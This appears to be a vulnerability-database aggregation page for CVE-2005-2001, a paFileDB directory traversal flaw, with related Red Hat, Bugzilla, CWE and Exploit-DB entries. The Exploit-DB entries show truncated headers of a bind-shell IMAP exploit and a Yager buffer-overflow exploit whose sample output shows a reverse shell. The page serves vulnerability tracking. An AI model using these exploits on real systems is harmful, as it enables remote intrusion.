CVE-2005-2001
Published 2005-06-15
CVE-2005-2001: Directory traversal vulnerability in pafiledb.php in paFileDB 3.1 and earlier allows remote attackers to include arbitrary files via a .. (dot dot) in the…
Priority P4 · 25 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS: 1.79% (75.6th percentile)
Directory traversal vulnerability in pafiledb.php in paFileDB 3.1 and earlier allows remote attackers to include arbitrary files via a .. (dot dot) in the action parameter.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat · 2.1 LOW
GHSA
GHSA-92m4-g4mr-whg7: Directory traversal vulnerability in pafiledb
ghsa_unreviewed·2022-05-01
CVE-2005-2001 [MEDIUM] GHSA-92m4-g4mr-whg7: Directory traversal vulnerability in pafiledb
Directory traversal vulnerability in pafiledb.php in paFileDB 3.1 and earlier allows remote attackers to include arbitrary files via a .. (dot dot) in the action parameter.
Red Hat
security flaw
vendor_redhat·2005-04-06·CVSS 2.1
CVE-2005-1038 [LOW] security flaw
security flaw
crontab in Vixie cron 4.1, when running with the -e option, allows local users to read the cron files of other users by changing the file being edited to a symlink. NOTE: there is insufficient information to know whether this is a duplicate of CVE-2001-0235.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
No detection rules found.
Exploit-DB
e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow
exploitdb·2005-06-02
CVE-2005-1903 e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow
e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow
---
//**************************************************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//**************************************************************************
#include
#i
Exploit-DB
Yager 5.24 - Remote Buffer Overflow
exploitdb·2005-04-25
CVE-2005-1163 Yager 5.24 - Remote Buffer Overflow
Yager 5.24 - Remote Buffer Overflow
---
/*
*
* Yager > 1
* --[ sending handshake [UDP]...done!
* --[ reading server response [UDP]...done!
* --[ server port: 1089
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
* --[ exploiting packet overflow...
* --[ sending packet...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.100
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Yager>
*
*/
#include
#include
#include
#include
#define PORT_UDP 34855
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
*
Bugzilla
CVE-2005-1038 security flaw
bugzilla·2018-08-16·CVSS 2.1
CVE-2005-1038 [LOW] CVE-2005-1038 security flaw
CVE-2005-1038 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
crontab in Vixie cron 4.1, when running with the -e option, allows local users to read the cron files of other users by changing the file being edited to a symlink. NOTE: there is insufficient information to know whether this is a duplicate of CVE-2001-0235.
---
Statement:
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla
CVE-2005-2933 imap buffer overflow
bugzilla·2006-03-05·CVSS 7.5
CVE-2005-2933 [HIGH] CVE-2005-2933 imap buffer overflow
CVE-2005-2933 imap buffer overflow
Remote exploitation of a buffer overflow vulnerability in the University
of Washington's IMAP Server (UW-IMAP) allows attackers to execute
arbitrary code. (quote from iDefense advisory, see
http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=313)
All versions of imap < imap-2004g are affected. This includes RHL 7.3, RHL 9,
and probably most FC versions.
RH used the following patch to fix the issue in RHEL 2.1:
--snip--
Fix for CAN-2005-2933, from iDefense's advisory.
diff -uNr imap-2001a/src/c-client/mail.c imap-2004g/src/c-client/mail.c
--- imap-2001a/src/c-client/mail.c 2001-11-13 14:29:07.000000000 -0500
+++ imap-2004g/src/c-client/mail.c 2005-09-15 12:57:07.000000000 -0400
@@ -587,8 +587,10 @@
if (c == '=') { /
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-07-21·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #162022 +++
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solut
Bugzilla
CVE-2005-1038 vixie-cron information leak
bugzilla·2005-06-29·CVSS 2.1
CVE-2005-1038 [LOW] CVE-2005-1038 vixie-cron information leak
CVE-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
Our current fix for this issue is not complete. A race condition still exists
between the time we lstat the file in question, and when we open the file.
---
This is now fixed with vixie-cron-4.1-8.EL3, available from:
http://people.redhat.com/~jvdias/cron/RHEL-3/4.1-8.EL3
The race condition has been circumvented: the fopen() is done as
the non-root user, which also f
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-04-20·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #154922 +++
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
Oops...only applies to 4.1 which is not included <= FC2
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-04-14·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
Actually, in RHEL-3, vixie-cron-3.0.1-76 would not have this problem,
because it used fstat(fd,&st) on the same original file descriptor
for the file that was unlinked by the attack; since the modification
time had not changed, it would print
'crontab: no changes made to crontab'
and would not install the link as the new crontab.
Because this version crontab did not re-open the f
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-04-14·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
This is fixed with vixie-cron-4.1-33_FC3, FC-3 update #320.
---
No errata covers the FC-3 update #320 - this problem is fixed with
vixie-cron-4.1-33_FC3
and in
FC4's vixie-cron-4.1-33
CWE
Improper Preservation of Permissions
mitre_cwe·CVSS 7.8
[HIGH] CWE-281 Improper Preservation of Permissions
CWE-281: Improper Preservation of Permissions
The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Application Data, Modify Application Data.
Observed Examples:
CVE-2002-2323: Incorrect ACLs used when restoring backups from directories that use symbolic links.
CVE-2001-1515: Automatic modification of permissions inherited from another file system.
CVE-2005-1920: Permissions on backup file are created with defaults,
CWE
Cleartext Storage of Sensitive Information in Executable
mitre_cwe·CVSS 2.1
[LOW] CWE-318 Cleartext Storage of Sensitive Information in Executable
CWE-318: Cleartext Storage of Sensitive Information in Executable
The product stores sensitive information in cleartext in an executable.
Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data.
Observed Examples:
CVE-2005-1794: Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks.
CVE-2001-1527: administration passwords in cleartext in executa
http://marc.info/?l=bugtraq&m=111885787217807&w=2
http://www.gulftech.org/?node=research&article_id=00082-06142005
http://www.phparena.net/
http://www.phparena.net/pafiledb_patch/